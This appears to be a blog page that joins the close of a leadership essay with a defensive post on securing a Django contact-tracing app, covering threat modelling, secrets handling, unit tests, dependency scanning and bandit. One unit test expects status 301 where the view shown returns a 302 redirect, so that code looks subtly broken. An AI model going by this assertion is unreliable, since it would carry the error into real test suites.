To embody the values of the organization is not only about the actions you take, but also about the expectations you set. If we want to build excellence, we should not tolerate long-term underperformance. But more importantly, we should not tolerate systematic behaviors that go contrary to our values. When underperformance manifests itself, or behaviors that go contrary to our vision, to our stated values, show up repeatedly, we must act.

In a culture where tasks are valued above relationships, where measurements count more than progress, underperformance is often met with punishment. No bonus, lower salary adjustments. Or firing the individual. While such measures have their place, they should not be the start of improvement. For a situation where people act differently than we would expect with a set vision, with our defined values, we must ask ourselves what the cause of this behavior is. For a leader the first question should be “is there something in the way I lead that would make people believe those undesired behaviors are tolerated, or even encouraged?”. Sometimes our actions have unintended consequences when interpreted by others.

The next question we should ask is if there are misaligned incentives driving the behaviors we see. Do we reward results in a way that practically forces people to take shortcuts, or actions we do not actually want, to make our measurements hit target? This type of opportunism will often manifest itself when motivation is entirely extrinsic, and there is a mismatch in the interests between the agent (the employee) and the principal (the leader, or the organization).

If we want to identify the cause of the performance slip, or the non-productive behaviors, we can only achieve this through dialog. You as a leader must have a conversation with the person displaying these behaviors. This is a great opportunity for situational leadership. What approach is appropriate and effective in the current situation? Is it a directive style, where you tell the other person what to do? Is it a coaching and participating style, where you support self-reflection to enable the desired change? Warnings and disciplinary actions tend to be an extreme variant of the directive leadership style, and if the lack of harmony with expected behavioral standards is severe, this can be necessary. We are then often talking about serious violations of norms, or code of conduct. Most often this is not the case, and a very directive approach can be counterproductive, especially if there is not a high level of trust already in the relationship between you and the person you are trying to help change his or her ways.

The conclusion of this is that leadership is complex and more about people than it is about measurements. Using the SERVE principle as a guideline for how you think about leadership can be very helpful as it helps you balance focus between driving results and creating strong relationships to underpin the results.

Who supports the leader?

Being a leader can feel very lonely. That is not a good situation and is completely unnecessary. Leaders need support structures. Sometimes you will need to think about complex dilemmas, involving people you care about. Leaders must often make trade-offs between conflicting goals, desires and needs. To do this effectively we need support from those around us. The organization should provide some of that support, through leadership training, mentorship, management systems and through contact with other managers. Your own line manager should be available for discussing such issues. It can also be a very good idea to have a strong mentor to help you reflect on challenging situations.

You should pull necessary support from many sources. Leaders often try to portray themselves as someone with the answer to every question. They often keep the dilemmas hidden and deliver directives for execution. This can easily lead to micromanagement and suboptimal solutions. In many cases you can share the dilemma and have your people help sort out what should be done next instead of presenting them with a directive to execute. Remember – people have been hired for their talents, not as cogs in a wheel.

Another source of support is your friends and family. That support does not have to be “task related”. Simply taking time to have a good life and feel appreciated will make you a better leader. That helps you create results, both on your own, and through others.

Value work-life balance for yourself, and others. Long-term growth depends on it.

The take-away

  • It is your job to make sure there is a compelling vision articulated, shared by everyone
  • Hire the right people and support their development – professionally and as individuals
  • Improve things every day – innovation applies to processes, products and who we involve
  • Appreciate and support relationships at work, and make networking part of what you do
  • Live by the values you and your organization believe in. Be authentic, and build trust.
  • Take care of your mental and physical health – and help others do the same. This is work-life balance in practice.

Application security in Django projects

This is a quick blog post on how to remove some typical vulnerabilities in Django projects.

Even a coffee shop visitor registration app needs to take app security into account

The key aspects we are looking at are:

  • Threat modeling: thinking through what attackers could do
  • Secrets management with dotenv
  • Writing unit tests based on a threat model
  • Checking your dependencies with safety
  • Running static analysis with bandit

Threat model

The app we will use as an example here is a visitor registration app to help restaurants and bars with COVID-19 tracing. The app has the following key users:

  • SaaS administrator: access to full administration of the app for multiple customers (restaurants and bars)
  • Location administrator: access to visitor lists for individual location
  • Personal user: register visits at participating locations, view their own visit history and control privacy settings
  • Unregistered user: register visits at participating locations, persistent browser session lasting 14 days

The source code for this app is available here: https://github.com/hakdo/besokslogg/.

We use the keywords of the STRIDE method to come up with quick attack scenarios and testable controls. Note that most of these controls will only be testable with custom tests for the application logic.

Attack type | Scenario | Testable controls
Spoofing | Attacker guesses password | Password strength requirement by Django (OK – framework code); Lockout after 10 wrong consecutive attempts (need to implement in own code) (UNIT)
Tampering | – | –
Repudiation | Attacker can claim not to have downloaded CSV file of all user visits. | CSV export generates log that is not readable with the application user (UNIT)
Information disclosure | Attacker abusing lack of access control to gain access to visitor list | Test that visitor lists cannot be accessed from view without being logged in as the dedicated service account. (UNIT)
Information disclosure | Attacker steals cookie with MitM attack | Test that cookies are set with secure flag. (UNIT or STATIC)
Information disclosure | Attacker steals cookie in XSS attack | Test that cookies are set with HTTPOnly flag. (UNIT or STATIC); Test that there are no unsafe injections in templates (STATIC)
Denial of service | Attacker finds a parameter injection that crashes the application | Check that invalid parameters lead to a handled exception (cookies, form inputs, url parameters)
Elevation of privilege | Attacker gains SaaS administrator access through phishing. | Check that SaaS administrator login requires a safe MFA pattern (UNIT or MANUAL)

Simple threat model for contact tracing app
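The lockout control in the spoofing row has to be written in our own code. A minimal sketch of the counting logic is shown here. It is an assumption-laden illustration and not the app's implementation: the class name LoginAttemptTracker is hypothetical, state is kept in memory only, and a real deployment would need persistent storage and some way to unlock accounts again.

```python
class LoginAttemptTracker:
    """Counts consecutive failed logins per username (in memory only)."""

    def __init__(self, max_failures=10):
        self.max_failures = max_failures
        self._failures = {}

    def is_locked(self, username):
        return self._failures.get(username, 0) >= self.max_failures

    def record_failure(self, username):
        self._failures[username] = self._failures.get(username, 0) + 1

    def record_success(self, username):
        # A successful login resets the consecutive-failure counter
        self._failures.pop(username, None)


tracker = LoginAttemptTracker(max_failures=10)
for _ in range(9):
    tracker.record_failure("alice")
locked_after_nine = tracker.is_locked("alice")   # still below the limit
tracker.record_failure("alice")
locked_after_ten = tracker.is_locked("alice")    # limit reached
```

Keeping the counting logic separate from the login view makes it easy to cover with a plain unit test, which is what the (UNIT) marker in the table asks for.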

Secrets management

Django projects get a lot of their settings from a settings.py file. This file includes sensitive information by default, such as a SECRET_KEY used to generate session cookies or sign web tokens, email configurations and so on. Obviously we don’t want to leak this information. Using python-dotenv is a practical way to deal with this. This package allows you to keep your secrets in a .env file, load them as environment variables, and then read them into settings using os.getenv('name_of_variable'). This way the settings.py file will not contain any secrets. Remember to add your .env file to .gitignore to avoid pushing it to a repository. In addition, you should use different values for all secrets in your development and production environments.

import os
from dotenv import load_dotenv

load_dotenv()  # read key=value pairs from .env into the environment

SECRET_KEY = os.environ.get('SECRET_KEY')

In the code snippet above, we see that SECRET_KEY is no longer exposed. Use the same technique for email server configuration and other sensitive data.

When deploying to production you need to set the environment variables in that environment in a suitable and secure manner. You should avoid storing configurations in files on the server.
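One risk with reading secrets from the environment is that a missing variable silently becomes None. A minimal sketch of a guard is shown below. The helper name require_env is hypothetical and not part of Django or python-dotenv; it only wraps os.environ.get so that the application fails at startup instead of running with an empty secret.

```python
import os


def require_env(name):
    """Return the value of an environment variable, or fail loudly if unset or empty."""
    value = os.environ.get(name)
    if not value:
        raise RuntimeError(f"Missing required environment variable: {name}")
    return value


# In settings.py this could be used as:
# SECRET_KEY = require_env("SECRET_KEY")
```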

Unit tests

As we saw in the threat model, the typical way to fix a security issue is very similar to the typical way you would fix a bug.

  1. Identify the problem
  2. Identify a control that solves the problem
  3. Define a test case
  4. Implement the test and develop the control

In the visitor registration app, an issue we want to avoid is leaking visitor lists for a location. A control that avoids this is an authorisation check in the view that shows the visitor list. Here’s that code.

@login_required()
def visitorlist(request):
    alertmsg = ''
    try:
        thislocation = Location.objects.filter(service_account = request.user)[0]
        if thislocation:
            visits = Visit.objects.filter(location = thislocation).order_by('-arrival')
            chkdate = request.GET.get("chkdate", "")
            if chkdate:
                mydate = datetime.datetime.strptime(chkdate, "%Y-%m-%d")
                endtime = mydate + datetime.timedelta(days=1)
                visits = Visit.objects.filter(location = thislocation, arrival__gte=mydate, arrival__lte=endtime).order_by('-arrival')
                alertmsg = "Viser besøkende for " + mydate.strftime("%d.%m.%Y")
            return render(request, 'visitor/visitorlist.html', {'visits': visits, 'alertmsg': alertmsg})
    except Exception:
        print('Visitor list failed - wrong service account or no service account')
        return redirect('logout')

Here we see that we first require the user to be logged in to visit this view, and then on line 5 we check to see if we have a location where the currently logged in user is registered as a service account. A service account in this app is what we called a “location administrator” in our role descriptions in the beginning of our blog post. It seems our code already implements the required security controls, but to prove that and to make sure we detect it if someone changes that code, we need to write a unit test.

We have written a test where we have 3 users created in the test suite.

class VisitorListAuthorizationTest(TestCase):

    def setUp(self):
        # Create three users. create_user() hashes the password, which
        # self.client.login() needs in order to authenticate.
        user1 = User.objects.create_user(username="user1", password="donkeykong2016")
        user2 = User.objects.create_user(username="user2", password="donkeykong2017")
        User.objects.create_user(username="user3", password="donkeykong2018")

        # Create two locations with assigned service accounts
        # (objects.create() saves the row, so no extra save() is needed)
        Location.objects.create(service_account=user1)
        Location.objects.create(service_account=user2)

    def test_return_code_for_user3_on_visitorlist_is_301(self):
        # Authenticate as user 3 and make sure the login itself worked
        self.assertTrue(self.client.login(username='user3', password='donkeykong2018'))
        response = self.client.get('/visitorlist/')
        self.assertEqual(response.status_code, 301)

    def test_user3_is_redirected_away_from_visitorlist(self):
        # user3 is logged in but is not a service account for any location
        self.assertTrue(self.client.login(username='user3', password='donkeykong2018'))
        response = self.client.get('/visitorlist/', follow=True)
        self.assertTrue(response.redirect_chain)
        self.assertTemplateNotUsed(response, 'visitor/visitorlist.html')

    def test_http_response_is_200_on_user1_get_visitorlist(self):
        # user1 is the service account for location1 and should see the list
        self.assertTrue(self.client.login(username='user1', password='donkeykong2016'))
        response = self.client.get('/visitorlist/', follow=True)
        self.assertEqual(response.status_code, 200)
        self.assertTemplateUsed(response, 'visitor/visitorlist.html')

Here we are testing that user3 (who is not assigned as “service account” for any location) will be redirected when visiting the /visitorlist/ URL.

We are also testing that the security control does not break the user story for the authorized user, user1, who is assigned as the service account for location1.

We have now checked that the wrong user cannot access the URL without getting redirected, and that it works for the allowed user. If someone changes the logic so that the ownership check is skipped, this test will break. If, on the other hand, someone changes the URL configuration so that /visitorlist/ no longer points to this view, the test may or may not break, depending on what the URL then points to. It is therefore important to be careful when changing inputs that the tests depend on, such as URLs.

Vulnerable open source libraries

According to companies selling scanners for open source libraries, using vulnerable and outdated libraries is one of the most common security problems. It is certainly easy to introduce vulnerabilities this way, and since dependencies can be hard to trace manually, having a tool to do so is good. For Python, the package safety is a good open source alternative to commercial tools. It is based on the NVD (National Vulnerability Database) from NIST. The database safety uses is maintained by pyup.io and is updated once a month for free, or you can pay to get updates faster. If you have a high-stakes app, it may pay off to go with a commercial option or to write your own dependency checker.

Running it is as easy as

safety check -r requirements.txt

This will check the dependencies in requirements.txt for known vulnerabilities and print a simple report in the terminal. It can also be built into CI/CD pipelines, as it can export vulnerabilities in multiple formats and returns an exit status that can be used in automation.
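As a rough sketch of how the exit status could be used in a pipeline step, the helper below runs a scanner command and reports whether the build may continue. The function name dependency_gate is made up for this illustration, and the sketch assumes that the scanner exits with a non-zero status when it finds vulnerabilities.

```python
import subprocess
import sys


def dependency_gate(command):
    """Run a scanner command and report whether the build may continue.

    Returns True when the command exits with status 0, False otherwise.
    """
    result = subprocess.run(command, capture_output=True, text=True)
    # Echo the scanner's report so it ends up in the CI job log.
    if result.stdout:
        print(result.stdout, end="")
    if result.stderr:
        print(result.stderr, end="", file=sys.stderr)
    return result.returncode == 0
```

A pipeline script could then call dependency_gate(["safety", "check", "-r", "requirements.txt"]) and stop the build with sys.exit(1) when it returns False. This assumes the safety command is installed on the build agent; if it is missing, subprocess.run raises FileNotFoundError.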

Static analysis with bandit

Static analysis can check for known anti-patterns in code. A popular choice for finding vulnerabilities in Python code is bandit. It will test for hardcoded passwords, weak crypto and many other things. It will not catch business logic flaws or poor architectural choices, but it is a good help for avoiding pitfalls. Make sure you avoid scanning your virtual environment and tests, unless you want a very long report. Scanning your current project is simple:

bandit -r .

To avoid scanning certain paths, create a .bandit file with defined excludes:

[bandit]
exclude: ./venv/,./*/tests.py

This file will exclude the virtual environment in ./venv and all files called “tests.py” in the immediate subfolders of the project directory.

A false positive

Bandit doesn’t know the context of the methods and patterns you use. One of its rules checks whether you are using the module random in your code. This is a standard Python module, but it is not cryptographically secure. In other words, creating hashing functions or generating certificates based on random numbers generated by it is a bad idea, as cryptanalysis could enable realistic attacks on the output of such generators. Using the random module for non-security purposes, on the other hand, is convenient and unproblematic. Our visitor log app does this, and then bandit tells us we did something naughty:

Test results:
        Issue: [B311:blacklist] Standard pseudo-random generators are not suitable for security/cryptographic purposes.
        Severity: Low   Confidence: High
        Location: ./visitor/views.py:59
        More Info: https://bandit.readthedocs.io/en/latest/blacklists/blacklist_calls.html#b311-random
     58          alco = ''
     59          valcode =  ''.join(random.choice(string.ascii_lowercase) for i in range(6)) 
     60          errmsg = ''    
 

What we see here is the check for cryptographically insecure random numbers. We are using the random module only to confirm that a user knows what they are doing when deleting their own account. The app generates a 6-letter random code that the user has to repeat in a text box to delete their account and all associated data. This is not security critical. We can therefore add the comment # nosec to the line in question, and the scanner will no longer report this finding.
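The distinction can be sketched as follows. The function names confirmation_code and security_token are invented for this illustration and are not taken from the visitor log app. The first function mirrors the flagged line and carries the # nosec marker, while the second shows what one would typically reach for when the value really must be unguessable, namely the standard library's secrets module.

```python
import random
import secrets
import string


def confirmation_code(length=6):
    """Code the user retypes to confirm account deletion; not a secret."""
    # Deliberate use of the non-cryptographic generator, hence the nosec marker.
    return ''.join(random.choice(string.ascii_lowercase) for _ in range(length))  # nosec


def security_token(nbytes=32):
    """Value that must be unguessable, for example a password reset token."""
    # secrets draws from the operating system's cryptographic random source.
    return secrets.token_urlsafe(nbytes)
```

Keeping the two use cases in separate functions makes it easier to see at review time that the # nosec marker only covers the harmless case.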

Things we will not catch

A static analyser will give you false positives, and there will be dangerous patterns it does not have tests for. There will be things in our threat model we have overlooked, and therefore security controls and test requirements that are missing. Open source libraries can have vulnerabilities that are not yet in the database used by our scanner tool. Such libraries can also be malicious in themselves, either by design or because they have been compromised, and our checks will not catch that. Perhaps fuzzing could, but not always. In spite of this, simple measures such as writing a few unit tests and running some scanners can remove a lot of weaknesses in an application. Building these into a solid CI/CD pipeline will take you a long way towards “secure by default”.